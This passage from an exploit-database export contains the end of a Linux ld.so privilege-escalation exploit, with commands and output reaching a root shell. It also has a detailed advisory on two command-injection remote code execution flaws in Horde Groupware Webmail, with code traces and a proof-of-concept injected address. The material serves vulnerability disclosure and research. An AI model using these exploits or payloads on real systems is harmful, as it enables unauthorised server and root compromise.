\r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<18)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\nreal 0m2.093s\r\nuser 0m0.384s\r\nsys 0m1.702s\r\n \r\n...\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<25)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\nreal 0m17.071s\r\nuser 0m2.525s\r\nsys 0m14.537s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<26)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\nreal 0m33.926s\r\nuser 0m5.464s\r\nsys 0m28.429s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<27)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nsh-4.2# id; exit\r\nuid=0(root) gid=0(root) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n \r\nreal 1m30.604s\r\nuser 0m16.169s\r\nsys 1m14.395s\r\n \r\n \r\n========================================================================\r\nAcknowledgments\r\n========================================================================\r\n \r\nWe thank the members of the [email\u00a0protected] list.\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/29207"}, {"lastseen": "2018-04-02T05:26:12", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "SecuriTeam", "published": "2017-04-12T00:00:00", "title": "Horde Groupware Webmail 3 / 4 / 5 - Multiple Remote Code Execution Vulnerabilities", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-04-12T00:00:00", "href": "https://0day.today/exploit/description/27576", "id": "1337DAY-ID-27576", "sourceData": "Source: https://blogs.securiteam.com/index.php/archives/3107\r\n \r\nVulnerabilities Summary\r\nThe following advisory describes two (2) vulnerabilities found in\r\nHorde Groupware Webmail.\r\n \r\nHorde Groupware Webmail Edition is a free, enterprise ready, browser\r\nbased communication suite. Users can read, send and organize email\r\nmessages and manage and share calendars, contacts, tasks, notes,\r\nfiles, and bookmarks with the standards compliant components from the\r\nHorde Project. Horde Groupware Webmail Edition bundles the separately\r\navailable applications IMP, Ingo, Kronolith, Turba, Nag, Mnemo,\r\nGollem, and Trean.\r\n \r\nIt can be extended with any of the released Horde applications or the\r\napplications that are still in development, like a bookmark manager or\r\na file manager.\r\n \r\nAffected versions: Horde 5, 4 and 3\r\n \r\nThe vulnerabilities found in Horde Groupware Webmail are:\r\n \r\nAuthentication Remote Code Execution\r\nUnauthentication Remote Code Execution\r\n \r\nCredit\r\nAn independent security researcher has reported this vulnerability to\r\nBeyond Security\u2019s SecuriTeam Secure Disclosure program.\r\n \r\nVendor response\r\nHorde has released a patch to address the vulnerabilities.\r\n \r\nFor more information:\r\nhttps://lists.horde.org/archives/horde/Week-of-Mon-20170403/056767.html\r\n \r\nVulnerabilities Details\r\n \r\nAuthentication Remote Code Execution\r\nHorde Webmail contains a vulnerability that allows a remote attacker\r\nto execute arbitrary code with the privileges of the user who runs the\r\nweb server.\r\n \r\nFor successful attack GnuPG feature should be enabled on the target\r\nserver (path to gpg binary should be defined in $conf[gnupg][path]\r\nsetting).\r\n \r\nVulnerable code: encryptMessage() function of GPG feature.\r\n \r\nPath: /Horde/Crypt/Pgp/Backend/Binary.php:\r\n \r\n/* 416 */ public function encryptMessage($text, $params)\r\n/* 417 */ {\r\n/* \u2026 */\r\n/* 435 */ foreach (array_keys($params['recips']) as $val) {\r\n/* 436 */ $cmdline[] = '--recipient ' . $val;\r\n#! vulnerable code\r\n/* \u2026 */\r\n/* 444 */ /* Encrypt the document. */\r\n/* 445 */ $result = $this->_callGpg(\r\n/* 446 */ $cmdline,\r\n/* 447 */ 'w',\r\n/* 448 */ empty($params['symmetric']) ? null : $params['passphrase'],\r\n/* 449 */ true,\r\n/* 450 */ true\r\n/* 451 */ );\r\n \r\n$params[\u2018recips\u2019] will be added to $cmdline array and passed to _callGpg():\r\n \r\nPath: /Horde/Crypt/Pgp/Backend/Binary.php:\r\n \r\n/* 642 */ public function _callGpg(\r\n/* 643 */ $options, $mode, $input = array(), $output = false, $stderr = false,\r\n/* 644 */ $parseable = false, $verbose = false\r\n/* 645 */ )\r\n/* 646 */ {\r\n/* \u2026 */\r\n/* 675 */ $cmdline = implode(' ', array_merge($this->_gnupg, $options));\r\n/* \u2026 */\r\n/* 681 */ if ($mode == 'w') {\r\n/* 682 */ if ($fp = popen($cmdline, 'w')) { #!\r\nvulnerable code\r\n/* \u2026 */\r\n \r\nWe can see that our recipients (addresses) will be in command line\r\nthat is going to be executed. encryptMessage() function can be reached\r\nby various API, requests. For example it will be called when user try\r\nto send encrypted message.\r\n \r\nOur request for encryption and sending our message will be processed\r\nby buildAndSendMessage() method:\r\nPath: /imp/lib/Compose.php\r\n \r\n/* 733 */ public function buildAndSendMessage(\r\n/* 734 */ $body, $header, IMP_Prefs_Identity $identity, array $opts = array()\r\n/* 735 */ )\r\n/* 736 */ {\r\n/* 737 */ global $conf, $injector, $notification, $prefs, $registry, $session;\r\n/* 738 */\r\n/* 739 */ /* We need at least one recipient & RFC 2822 requires that no 8-bit\r\n/* 740 */ * characters can be in the address fields. */\r\n/* 741 */ $recip = $this->recipientList($header);\r\n/* ... */\r\n/* 793 */ /* Must encrypt & send the message one recipient at a time. */\r\n/* 794 */ if ($prefs->getValue('use_smime') &&\r\n/* 795 */ in_array($encrypt, array(IMP_Crypt_Smime::ENCRYPT,\r\nIMP_Crypt_Smime::SIGNENC))) {\r\n/* ... */\r\n/* 807 */ } else {\r\n/* 808 */ /* Can send in clear-text all at once, or PGP can encrypt\r\n/* 809 */ * multiple addresses in the same message. */\r\n/* 810 */ $msg_options['from'] = $from;\r\n/* 811 */ $save_msg = $this->_createMimeMessage($recip['list'], $body,\r\n$msg_options); #! vulnerable code\r\n \r\nIn line 741 it tries to create recipient list: Horde parsers values of\r\n\u2018to\u2019, \u2018cc\u2019, \u2018bcc\u2019 headers and creates list of Rfc822 addresses. In\r\ngeneral there are restrictions for characters in addresses but if we\r\nwill use the next format:\r\n \r\ndisplay-name <\"somemailbox\"@somedomain.com>\r\n \r\nsomemailbox will be parsed by _rfc822ParseQuotedString() method:\r\n \r\nPath: /Horde/Mail/Rfc822.php:\r\n \r\n/* 557 */ protected function _rfc822ParseQuotedString(&$str)\r\n/* 558 */ {\r\n/* 559 */ if ($this->_curr(true) != '\"') {\r\n/* 560 */ throw new Horde_Mail_Exception('Error when parsing a quoted string.');\r\n/* 561 */ }\r\n/* 563 */ while (($chr = $this->_curr(true)) !== false) {\r\n/* 564 */ switch ($chr) {\r\n/* 565 */ case '\"':\r\n/* 566 */ $this->_rfc822SkipLwsp();\r\n/* 567 */ return;\r\n/* 569 */ case \"\\n\":\r\n/* 570 */ /* Folding whitespace, remove the (CR)LF. */\r\n/* 571 */ if (substr($str, -1) == \"\\r\") {\r\n/* 572 */ $str = substr($str, 0, -1);\r\n/* 573 */ }\r\n/* 574 */ continue;\r\n/* 576 */ case '\\\\':\r\n/* 577 */ if (($chr = $this->_curr(true)) === false) {\r\n/* 578 */ break 2;\r\n/* 579 */ }\r\n/* 580 */ break;\r\n/* 581 */ }\r\n/* 583 */ $str .= $chr;\r\n/* 584 */ }\r\n/* 586 */ /* Missing trailing '\"', or partial quoted character. */\r\n/* 587 */ throw new Horde_Mail_Exception('Error when parsing a quoted string.');\r\n/* 588 */ }\r\n \r\nThere are only a few limitations:\r\n \r\nwe cannot use \u201c\r\n\\n will be deleted\r\nwe cannot use \\ at the end of our mailbox\r\n \r\nAfter creation of recipient list buildAndSendMessage() will call\r\n_createMimeMessage():\r\n \r\nPath: /imp/lib/Compose.php\r\n \r\n/* 1446 */ protected function _createMimeMessage(\r\n/* 1447 */ Horde_Mail_Rfc822_List $to, $body, array $options = array()\r\n/* 1448 */ )\r\n/* 1449 */ {\r\n/* 1450 */ global $conf, $injector, $prefs, $registry;\r\n/* ... */\r\n/* 1691 */ /* Set up the base message now. */\r\n/* 1692 */ $encrypt = empty($options['encrypt'])\r\n/* 1693 */ ? IMP::ENCRYPT_NONE\r\n/* 1694 */ : $options['encrypt'];\r\n/* 1695 */ if ($prefs->getValue('use_pgp') &&\r\n/* 1696 */ !empty($conf['gnupg']['path']) &&\r\n/* 1697 */ in_array($encrypt, array(IMP_Crypt_Pgp::ENCRYPT,\r\nIMP_Crypt_Pgp::SIGN, IMP_Crypt_Pgp::SIGNENC,\r\nIMP_Crypt_Pgp::SYM_ENCRYPT, IMP_Crypt_Pgp::SYM_SIGNENC))) {\r\n/* 1698 */ $imp_pgp = $injector->getInstance('IMP_Crypt_Pgp');\r\n/* ... */\r\n/* 1727 */ /* Do the encryption/signing requested. */\r\n/* 1728 */ try {\r\n/* 1729 */ switch ($encrypt) {\r\n/* ... */\r\n/* 1735 */ case IMP_Crypt_Pgp::ENCRYPT:\r\n/* 1736 */ case IMP_Crypt_Pgp::SYM_ENCRYPT:\r\n/* 1737 */ $to_list = clone $to;\r\n/* 1738 */ if (count($options['from'])) {\r\n/* 1739 */ $to_list->add($options['from']);\r\n/* 1740 */ }\r\n/* 1741 */ $base = $imp_pgp->IMPencryptMIMEPart($base, $to_list,\r\n($encrypt == IMP_Crypt_Pgp::SYM_ENCRYPT) ?\r\n$symmetric_passphrase : null);\r\n/* 1742 */ break;\r\n \r\nHere we can see validation (1695-1696 lines) that:\r\n \r\nCurrent user has enabled \u201cuse_pgp\u201d feature in his preferences (it is\r\nnot a problem as an attacker can edit his own preferences)\r\n$conf[\u2018gnupg\u2019][\u2018path\u2019] is not empty. This value can be edited only by\r\nadmin. So if we don\u2019t have value here our server is not vulnerable.\r\nBut if admin wants to allow users to use GPG feature he/she needs to\r\ndefine value for this config.\r\n \r\nAlso we can see that in lines 1737-1739 to our recipient list will be\r\nadded address \u201cfrom\u201d as well.\r\n \r\nPath: /imp/lib/Crypt/Pgp.php\r\n \r\n/* 584 */ public function impEncryptMimePart($mime_part,\r\n/* 585 */ Horde_Mail_Rfc822_List $addresses,\r\n/* 586 */ $symmetric = null)\r\n/* 587 */ {\r\n/* 588 */ return $this->encryptMimePart($mime_part,\r\n$this->_encryptParameters($addresses, $symmetric));\r\n/* 589 */ }\r\n \r\nBefore encryptMimePart() call Horde uses _encryptParameters()\r\n \r\nPath: /imp/lib/Crypt/Pgp.php\r\n \r\n/* 536 */ protected function _encryptParameters(Horde_Mail_Rfc822_List\r\n$addresses,\r\n/* 537 */ $symmetric)\r\n/* 538 */ {\r\n/* ... */\r\n/* 546 */ $addr_list = array();\r\n/* 548 */ foreach ($addresses as $val) {\r\n/* 549 */ /* Get the public key for the address. */\r\n/* 550 */ $bare_addr = $val->bare_address;\r\n/* 551 */ $addr_list[$bare_addr] = $this->getPublicKey($bare_addr);\r\n/* 552 */ }\r\n/* 554 */ return array('recips' => $addr_list);\r\n/* 555 */ }\r\n \r\nHorde will add to each address its Public Key. There a few source of\r\nPublic Keys:\r\n \r\nAddressBook (we will use this source)\r\nServers with Public Keys\r\n \r\nNote that Horde should be able to find Public Key for our \u201cFrom\u201d\r\naddress as well.\r\nWe can generate pair of PGP keys (https is required) or we can use the\r\nsame trick with AddressBook (we can create some contact, add any valid\r\nPublic PGP key, and add this address to default identity)\r\nencryptMimePart() will call encrypt() method\r\n \r\nPath: /Horde/Crypt/Pgp.php\r\n \r\n/* 773 */ public function encryptMIMEPart($mime_part, $params = array())\r\n/* 774 */ {\r\n/* 775 */ $params = array_merge($params, array('type' => 'message'));\r\n/* \u2026 */\r\n/* 781 */ $message_encrypt = $this->encrypt($signenc_body, $params);\r\n \r\nIt will call encryptMessage()\r\n \r\nPath: /Horde/Crypt/Pgp.php\r\n \r\n/* 554 */ public function encrypt($text, $params = array())\r\n/* 555 */ {\r\n/* 556 */ switch (isset($params['type']) ? $params['type'] : false) {\r\n/* 557 */ case 'message':\r\n/* 558 */ $error = Horde_Crypt_Translation::t(\r\n/* 559 */ \"Could not PGP encrypt message.\"\r\n/* 560 */ );\r\n/* 561 */ $func = 'encryptMessage';\r\n/* 562 */ break;\r\n/* ... */\r\n/* 586 */ $this->_initDrivers();\r\n/* 587 */\r\n/* 588 */ foreach ($this->_backends as $val) {\r\n/* 589 */ try {\r\n/* 590 */ return $val->$func($text, $params);\r\n/* 591 */ } catch (Horde_Crypt_Exception $e) {}\r\n/* 592 */ }\r\n \r\nIn conclusions:\r\nIf Horde server has enabled \u201cGnuPG feature\u201d any unprivileged user is\r\nable to execute arbitrary code.\r\n \r\nEnable GPG feature for attacker account (\u201cEnable PGP functionality?\u201d\r\ncheckbox on \u201cPGP Configure PGP encryption support.\u201d section in\r\nPrefferences->Mail page )\r\nCreate some contact in the attacker AddressBook, add any valid Public\r\nPGP key, and add this address to default identity\r\nCreate another contact in the attacker AddressBook, add any valid\r\nPublic PGP key, and change email address to some$(desired command to\r\nexecute) [email\u00a0protected]\r\nCreate a new message to some$(desired command to execute) [email\u00a0protected]\r\nChoose Encryption:PGP Encrypt Message option\r\nClick Send button\r\n \r\nAnd desired command will be executed on the Horde server.\r\n \r\nProof of Concept \u2013 Authenticated Code Execution\r\n \r\nFor Proof of Concept we can use preconfigured image of Horde server\r\nfrom Bitnami (Bitnami \u2013 \u201cEasy to use cloud images, containers, and VMs\r\nthat work on any platform\u201d):\r\n \r\nhttps://downloads.bitnami.com/files/stacks/horde/5.2.17-0/bitnami-horde-5.2.17-0-linux-ubuntu-14.04-x86_64.ova\r\n \r\nStep 1 \u2013 Login as admin (by default user:bitnami) and go to\r\nAdministration -> Configuration and choose Horde (horde). Open GnuPG\r\ntab, enter /usr/bin/gpg into $conf[gnupg][path] setting and click\r\n\u201cGenerate Horde Configuration\u201c:\r\n \r\nNow we have enabled GPG feature on our server and we can login as\r\nregular user and try to execute desired commands. But Bitnami image\r\ndoes not have installed and configured Mail server so we need to use\r\nexternal one or install it on local machine.\r\n \r\nWe will use gmail account (to be able to login to it from Horde I had\r\nto change Gmail account setting Allow less secure apps: ON).\r\n \r\nTo use external Mail server we need to change the next setting:\r\n\u201cAdministrator Panel\u201d -> \u201cConfiguration\u201d -> \u201cHorde\u201d ->\r\n\u201cAuthentication\u201d\r\n \r\nStep 2 \u2013 Configure Horde web-mail authentication ($conf[auth][driver])\r\nto \u201cLet a Horde application handle authentication\u201d and click \u201cGenerate\r\nHorde Configuration\u201d:\r\n \r\nStep 3 \u2013 logout and login with your gmail account. Currently we are\r\nlogin as regular user so we can try to execute desired commands:\r\n \r\nGo to Preferences -> Mail and click on PGP link. Check Enable PGP\r\nfunctionality? checkbox and click \u201cSave\u201d:\r\n \r\nCreate \u201cfrom\u201d contact in our AddressBook: \u201cAddress Book -> New Contact\r\n-> in Address Book of \u2026\u201d\r\n \r\nPersonal tab \u2013 Last Name: mymailboxwithPGPkey\r\nCommunication tab \u2013 Email: [email\u00a0protected]\r\nOther tab \u2013 PGP Public Key: any valid Public PGP key.\r\n \r\nFor example:\r\n \r\n-----BEGIN PGP PUBLIC KEY BLOCK-----\r\nVersion: SKS 1.1.6\r\nComment: Hostname: keyserver.ubuntu.com\r\nmQGiBDk89iARBADhB7AyHQ/ZBlZjRRp1/911XaXGGmq1LDLTUTCAbJyQ1TzKDdetfT9Szk01\r\nYPdAnovgzxTS89svuVHP/BiqLqhJMl2FfMLcJX+va+DujGuLDCZDHi+4czc33N3z8ArpxzPQ\r\n5bfALrpNMJi6v2gZkDQAjMoeKrNEfXLCXQbTYWCuhwCgnZZCThya4xhmlLCTkwsQdMjFoj8D\r\n/iOIP/6W27opMJgZqTHcisFPF6Kqyxe6GAftJo6ZtLEG26k2Qn3O0pghDz2Ql4aDVki3ms82\r\nz77raSqbZVJzAFPzYoIKuc3JOoxxE+SelzSzj4LuQRXYKqZzT8/qYBCLg9cmhdm8PnwE9fd/\r\nPOGnNQFMk0i2xSz0FMr9R1emIKNsA/454RHIZ39ebvZzVULS1pSo6cI7DAJFQ3ejJqEEdAbr\r\n72CW3eFUAdF+4bJQU/V69Nr+CmziBbyqKP6HfiUH9u8NLrYuK6XWXLVVSCBPsOxHxhw48hch\r\nzVxJZ5Cyo/tMSOY/CxvLL/vMoT2+kQX1SCsWALosKJyOGbpCJmPasOLKdrQnQWxpY2UgKFJl\r\nY2h0c2Fud8OkbHRpbikgPGFsaWNlQGN5Yi5vcmc+iEYEEBECAAYFAjk+IEgACgkQzDSD4hsI\r\nfQSaWQCgiDvvnRxa8XFOKy/NI7CKL5X4D28An2k9Cbh+dosXvB5zGCuQiAkLiQ+CiEYEEREC\r\nAAYFAkKTPFcACgkQCY+3LE2/Ce4l+gCdFSHqp5HQCMKSOkLodepoG0FiQuwAnR2nioCQ3A5k\r\nYI0NfUth+0QzJs1ciFYEExECABYFAjk89iAECwoEAwMVAwIDFgIBAheAAAoJEFsqCm37V5ep\r\nfpAAoJezEplLlaGQHM8ppKReVHSyGuX+AKCYwRcwJJwoQHM8p86xhSuC/opYPoheBBMRAgAW\r\nBQI5PPYgBAsKBAMDFQMCAxYCAQIXgAASCRBbKgpt+1eXqQdlR1BHAAEBfpAAoJezEplLlaGQ\r\nHM8ppKReVHSyGuX+AKCYwRcwJJwoQHM8p86xhSuC/opYPrkBDQQ5PPYqEAQArSW27DriJAFs\r\nOr+fnb3VwsYvznFfEv8NJyM/9/lDYfIROHIhdKCWswUWCgoz813RO2taJi5p8faM048Vczu/\r\nVefTzVrsvpgXUIPQoXjgnbo6UCNuLqGk6TnwdJPPNLuIZLBEhGdA+URtFOA5tSj67h0G4fo0\r\nP8xmsUXNgWVxX/MAAwUD/jUPLFgQ4ThcuUpxCkjMz+Pix0o37tOrFOU/H0cn9SHzCQKxn+iC\r\nsqZlCsR+qXNDl43vSa6Riv/aHtrD+MJLgdIVkufuBWOogtuojusnFGY73xvvM1MfbG+QaUqw\r\ngfe4UYOchLBNVtfN3WiqSPq5Yhue4m1u/xIvGGJQXvSBxNQyiEYEGBECAAYFAjk89ioACgkQ\r\nWyoKbftXl6kV5QCfV7GjnmicwJPgxUQbDMP9u5KuVcsAn3aSmYyI1u6RRlKoThh0WEHayISv\r\niE4EGBECAAYFAjk89ioAEgkQWyoKbftXl6kHZUdQRwABARXlAJ9XsaOeaJzAk+DFRBsMw/27\r\nkq5VywCfdpKZjIjW7pFGUqhOGHRYQdrIhK8=\r\n=RHjX\r\n-----END PGP PUBLIC KEY BLOCK-----\r\n \r\nClick \u201cAdd\u201d button:\r\n \r\nGo to Preferences -> Global Preferences and click on Personal\r\nInformation link. Put [email\u00a0protected] into field The default\r\ne-mail address to use with this identity and Click \u201cSave\u201d:\r\n \r\nCreate our \u201cto\u201d contact in our AddressBook: \u201cAddress Book -> New\r\nContact -> in Address Book of \u2026\u201d\r\n \r\nPersonal tab \u2013 Last Name: contact_for_attack\r\nCommunication tab \u2013 Email: [email\u00a0protected]\r\nOther tab \u2013 PGP Public Key: any valid Public PGP key (it can be the\r\nsame as in the previous step)\r\nAnd click \u201cAdd\u201d button:\r\n \r\nInject our command: Click on Edit. Go to Communication Tab, put cursor\r\nin Email field and chose \u201cInspect Element (Q)\u201d from context menu:\r\n \r\nDelete \u201cemail\u201d from the type argument and close Inspector:\r\n \r\n1\r\n<input name=\"object[email]\" id=\"object_email_\" value=\"[email\u00a0protected]\"\r\ntype=\"email\">\r\n \r\nEdit the address as we want \u2013 for example hereinj$(touch\r\n/tmp/hereisvuln)@any.com and click \u201cSave\u201d:\r\n \r\nCreate a new message ( Mail -> New Message) with our contact as recipient:\r\n \r\nChoose PGP Encrypt Message in Encryption option:\r\n \r\nEnter any subject and any content. Click \u201cSend\u201d\r\n \r\nWe will get \u201cPGP Error:\u2026\u201d\r\n \r\nIt is ok \u2013 let\u2019s check our server:\r\n \r\nWe have a new file \u201chereisvuln\u201d so our command was executed.\r\n \r\nUnauthentication Remote Code Execution\r\nHorde Webmail contains a vulnerability that allows a remote attacker\r\nto execute arbitrary code with the privileges of the user who runs the\r\nweb server.\r\n \r\nVulnerable code: decryptSignature() function of GPG feature.\r\n \r\nPath: /Horde/Crypt/Pgp/Backend/Binary.php:\r\n \r\n/* 539 */ public function decryptSignature($text, $params)\r\n/* 540 */ {\r\n/* ... */\r\n/* 550 */ /* Options for the GPG binary. */\r\n/* 551 */ $cmdline = array(\r\n/* 552 */ '--armor',\r\n/* 553 */ '--always-trust',\r\n/* 554 */ '--batch',\r\n/* 555 */ '--charset ' . (isset($params['charset']) ?\r\n$params['charset'] : 'UTF-8'),\r\n/* 556 */ $keyring,\r\n/* 557 */ '--verify'\r\n/* 558 */ );\r\n/* ... */\r\n/* 571 */ $result = $this->_callGpg($cmdline, 'r', null, true, true, true);\r\n/* ... */\r\n \r\n$params[\u2018charset\u2019] will be added to $cmdline array and passed to _callGpg():\r\n \r\n/* 642 */ public function _callGpg(\r\n/* 643 */ $options, $mode, $input = array(), $output = false, $stderr = false,\r\n/* 644 */ $parseable = false, $verbose = false\r\n/* 645 */ )\r\n/* 646 */ {\r\n/* \u2026 */\r\n/* 675 */ $cmdline = implode(' ', array_merge($this->_gnupg, $options));\r\n/* \u2026 */\r\n/* 681 */ if ($mode == 'w') {\r\n/* \u2026 */\r\n/* 704 */ } elseif ($mode == 'r') {\r\n/* 705 */ if ($fp = popen($cmdline, 'r')) {\r\n/* \u2026 */\r\n \r\nOur $params[\u2018charset\u2019] will be in command line that is going to be executed.\r\n \r\ndecryptSignature() is called from decrypt() method:\r\n \r\nPath \u2013 /Horde/Crypt/Pgp.php:\r\n \r\n/* 611 */ public function decrypt($text, $params = array())\r\n/* 612 */ {\r\n/* 613 */ switch (isset($params['type']) ? $params['type'] : false) {\r\n/* 614 */ case 'detached-signature':\r\n/* 615 */ case 'signature':\r\n/* 616 */ /* Check for required parameters. */\r\n/* 617 */ if (!isset($params['pubkey'])) {\r\n/* 618 */ throw new InvalidArgumentException(\r\n/* 619 */ 'A public PGP key is required to verify a signed message.'\r\n/* 620 */ );\r\n/* 621 */ }\r\n/* 622 */ if (($params['type'] === 'detached-signature') &&\r\n/* 623 */ !isset($params['signature'])) {\r\n/* 624 */ throw new InvalidArgumentException(\r\n/* 625 */ 'The detached PGP signature block is required to verify the\r\nsigned message.'\r\n/* 626 */ );\r\n/* 627 */ }\r\n/* 628 */\r\n/* 629 */ $func = 'decryptSignature';\r\n/* 630 */ break;\r\n/* ... */\r\n/* 650 */ $this->_initDrivers();\r\n/* 651 */\r\n/* 652 */ foreach ($this->_backends as $val) {\r\n/* 653 */ try {\r\n/* 654 */ return $val->$func($text, $params);\r\n/* 655 */ } catch (Horde_Crypt_Exception $e) {}\r\n/* 656 */ }\r\n/* ... */\r\n \r\ndecrypt() with needed parameters is used in verifySignature():\r\n \r\nPath \u2013 /imp/lib/Crypt/Pgp.php\r\n \r\n/* 339 */ public function verifySignature($text, $address, $signature = '',\r\n/* 340 */ $charset = null)\r\n/* 341 */ {\r\n/* 342 */ if (!empty($signature)) {\r\n/* 343 */ $packet_info = $this->pgpPacketInformation($signature);\r\n/* 344 */ if (isset($packet_info['keyid'])) {\r\n/* 345 */ $keyid = $packet_info['keyid'];\r\n/* 346 */ }\r\n/* 347 */ }\r\n/* 349 */ if (!isset($keyid)) {\r\n/* 350 */ $keyid = $this->getSignersKeyID($text);\r\n/* 351 */ }\r\n/* 353 */ /* Get key ID of key. */\r\n/* 354 */ $public_key = $this->getPublicKey($address, array('keyid' => $keyid));\r\n/* 356 */ if (empty($signature)) {\r\n/* 357 */ $options = array('type' => 'signature');\r\n/* 358 */ } else {\r\n/* 359 */ $options = array('type' => 'detached-signature', 'signature'\r\n=> $signature);\r\n/* 360 */ }\r\n/* 361 */ $options['pubkey'] = $public_key;\r\n/* 363 */ if (!empty($charset)) {\r\n/* 364 */ $options['charset'] = $charset;\r\n/* 365 */ }\r\n/* 369 */ return $this->decrypt($text, $options);\r\n/* 370 */ }\r\n \r\nverifySignature() is called from _outputPGPSigned():\r\n \r\nPath \u2013 /imp/lib/Mime/Viewer/Pgp.php\r\n \r\n/* 387 */ protected function _outputPGPSigned()\r\n/* 388 */ {\r\n/* 389 */ global $conf, $injector, $prefs, $registry, $session;\r\n/* 390 */\r\n/* 391 */ $partlist = array_keys($this->_mimepart->contentTypeMap());\r\n/* 392 */ $base_id = reset($partlist);\r\n/* 393 */ $signed_id = next($partlist);\r\n/* 394 */ $sig_id = Horde_Mime::mimeIdArithmetic($signed_id, 'next');\r\n/* 395 */\r\n/* 396 */ if (!$prefs->getValue('use_pgp') || empty($conf['gnupg']['path'])) {\r\n/* 397 */ return array(\r\n/* 398 */ $sig_id => null\r\n/* 399 */ );\r\n/* 400 */ }\r\n/* ... */\r\n/* 417 */ if ($prefs->getValue('pgp_verify') ||\r\n/* 418 */ $injector->getInstance('Horde_Variables')->pgp_verify_msg) {\r\n/* 419 */ $imp_contents = $this->getConfigParam('imp_contents');\r\n/* 420 */ $sig_part = $imp_contents->getMIMEPart($sig_id);\r\n/* ... */\r\n/* 433 */ try {\r\n/* 434 */ $imp_pgp = $injector->getInstance('IMP_Crypt_Pgp');\r\n/* 435 */ if ($sig_raw =\r\n$sig_part->getMetadata(Horde_Crypt_Pgp_Parse::SIG_RAW)) {\r\n/* 436 */ $sig_result = $imp_pgp->verifySignature($sig_raw,\r\n$this->_getSender()->bare_address, null, $sig_part-\r\n> getMetadata(Horde_Crypt_Pgp_Parse::SIG_CHARSET));\r\n/* ... */\r\n \r\nAnd it is used in _renderInline():\r\n \r\nPath \u2013 /imp/lib/Mime/Viewer/Pgp.php\r\n \r\n/* 134 */ protected function _renderInline()\r\n/* 135 */ {\r\n/* 136 */ $id = $this->_mimepart->getMimeId();\r\n/* 138 */ switch ($this->_mimepart->getType()) {\r\n/* ... */\r\n/* 142 */ case 'multipart/signed':\r\n/* 143 */ return $this->_outputPGPSigned();\r\n \r\nLet\u2019s go back to _outputPGPSigned() method. We can see a few\r\nrequirements before the needed call:\r\n \r\n$conf[\u2018gnupg\u2019][\u2018path\u2019] should be not empty. This value can be edited\r\nonly by admin(if he/she wants to allow users to use GPG feature he/she\r\nneeds to define value for this config).\r\nCurrent user has enabled \u201cuse_pgp\u201d feature in his preferences\r\nCurrent user has enabled \u201cpgp_verify\u201d feature in his preferences\r\nCurrent user has enabled \u201cpgp_verify\u201d feature in his preferences\r\n \r\nAlso we see that our charset value is taken from $sig_part ->\r\ngetMetadata(Horde_Crypt_Pgp_Parse::SIG_CHARSET)\r\n \r\nOur value will be stored during parsing of PGP parts:\r\n \r\nPath \u2013 /Horde/Crypt/Pgp/Parse.php\r\n \r\n/* 150 */ public function parseToPart($text, $charset = 'UTF-8')\r\n/* 151 */ {\r\n/* 152 */ $parts = $this->parse($text);\r\n/* ... */\r\n/* 162 */ while (list(,$val) = each($parts)) {\r\n/* 163 */ switch ($val['type']) {\r\n/* ... */\r\n/* 200 */ case self::ARMOR_SIGNED_MESSAGE:\r\n/* 201 */ if ((list(,$sig) = each($parts)) &&\r\n/* 202 */ ($sig['type'] == self::ARMOR_SIGNATURE)) {\r\n/* 203 */ $part = new Horde_Mime_Part();\r\n/* 204 */ $part->setType('multipart/signed');\r\n/* 205 */ // TODO: add micalg parameter\r\n/* 206 */ $part->setContentTypeParameter('protocol',\r\n'application/pgp-signature');\r\n/* 207 */\r\n/* 208 */ $part1 = new Horde_Mime_Part();\r\n/* 209 */ $part1->setType('text/plain');\r\n/* 210 */ $part1->setCharset($charset);\r\n/* 211 */\r\n/* 212 */ $part1_data = implode(\"\\n\", $val['data']);\r\n/* 213 */ $part1->setContents(substr($part1_data, strpos($part1_data,\r\n\"\\n\\n\") + 2));\r\n/* 214 */\r\n/* 215 */ $part2 = new Horde_Mime_Part();\r\n/* 216 */\r\n/* 217 */ $part2->setType('application/pgp-signature');\r\n/* 218 */ $part2->setContents(implode(\"\\n\", $sig['data']));\r\n/* 219 */\r\n/* 220 */ $part2->setMetadata(self::SIG_CHARSET, $charset);\r\n/* 221 */ $part2->setMetadata(self::SIG_RAW, implode(\"\\n\",\r\n$val['data']) . \"\\n\" . implode(\"\\n\", $sig['data']));\r\n/* 222 */\r\n/* 223 */ $part->addPart($part1);\r\n/* 224 */ $part->addPart($part2);\r\n/* 225 */ $new_part->addPart($part);\r\n/* 226 */\r\n/* 227 */ next($parts);\r\n/* 228 */ }\r\n/* 229 */ }\r\n/* 230 */ }\r\n/* 231 */\r\n/* 232 */ return $new_part;\r\n/* 233 */ }\r\n \r\nIt is called from _parsePGP():\r\n \r\nPath \u2013 /imp/lib/Mime/Viewer/Plain.php\r\n \r\n\u00d7\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n/* 239 */ protected function _parsePGP()\r\n/* 240 */ {\r\n/* 241 */ $part 